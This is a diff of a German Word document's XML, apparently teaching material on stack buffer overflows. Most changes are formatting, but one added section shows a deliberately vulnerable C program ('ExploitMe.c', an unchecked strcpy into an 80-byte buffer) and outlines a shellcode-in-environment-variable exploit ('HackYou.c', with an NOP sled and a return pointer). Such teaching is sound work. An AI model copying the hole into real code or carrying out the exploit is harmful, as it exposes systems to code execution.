+          <w:t>3</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
       </w:r>
@@ -2239,27 +2200,14 @@
       <w:r>
         <w:t xml:space="preserve">Abbildung </w:t>
       </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
+      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>4</w:t>
+        </w:r>
+      </w:fldSimple>
       <w:r>
         <w:t xml:space="preserve"> - </w:t>
       </w:r>
@@ -3038,7 +2986,7 @@
           <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
             <v:imagedata r:id="rId17" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411805178" r:id="rId18"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411819139" r:id="rId18"/>
         </w:object>
       </w:r>
     </w:p>
@@ -4243,7 +4191,7 @@
           <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:532.5pt;height:366.35pt" o:ole="">
             <v:imagedata r:id="rId20" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1411805179" r:id="rId21"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1411819140" r:id="rId21"/>
         </w:object>
       </w:r>
     </w:p>
@@ -5926,8 +5874,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Als C Code </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -5940,12 +5886,796 @@
     <w:p>
       <w:pPr>
         <w:tabs>
+          <w:tab w:val="left" w:pos="8039"/>
           <w:tab w:val="left" w:pos="8165"/>
         </w:tabs>
       </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Exploiting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> des Programms </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExploitMe.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Programmcode in C</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>106171</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1946080" cy="2054099"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
+                <wp:wrapNone/>
+                <wp:docPr id="15" name="Textfeld 15"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1946080" cy="2054099"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> &lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>string.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argc</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> **</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[80];</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>strcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[1]);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">    </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>return</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 1;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 15" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.35pt;width:153.25pt;height:161.75pt;z-index:251670528;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> &lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>string.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argc</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> **</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[80];</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>strcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[1]);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 1;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> von </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExploitMe.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="10579" w:dyaOrig="3615">
+          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:453.35pt;height:155.1pt" o:ole="">
+            <v:imagedata r:id="rId22" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1411819141" r:id="rId23"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Wie können wir das ausnutzen(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+      <w:r>
+        <w:object w:dxaOrig="12146" w:dyaOrig="8001">
+          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:607.65pt;height:400.35pt" o:ole="">
+            <v:imagedata r:id="rId24" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1411819142" r:id="rId25"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Konzept von </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HackYou.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Buffer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> erstellen, welcher als Umgebungsvariable gesetzt wird</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Variable benennen </w:t>
+      </w:r>
+      <w:r>
+        <w:t>z.B. „EGG“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>EGG beinhaltet</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (24Byte)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Padding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (60 Byte) – Aufgefüllt mit 0x90 (NOP Befehl)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> auf den </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (4 Byte)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>NULL (4 Byte)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Herrausforderung</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – Die Position des </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shellcodes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> im Prozessspeicher finden und Zeiger </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> auf ihn zeigen lassen.</w:t>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="10129" w:dyaOrig="2759">
+          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:453.35pt;height:123.45pt" o:ole="">
+            <v:imagedata r:id="rId26" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1411819143" r:id="rId27"/>
+        </w:object>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -6168,6 +6898,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="2D664CD0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EE8E6954"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
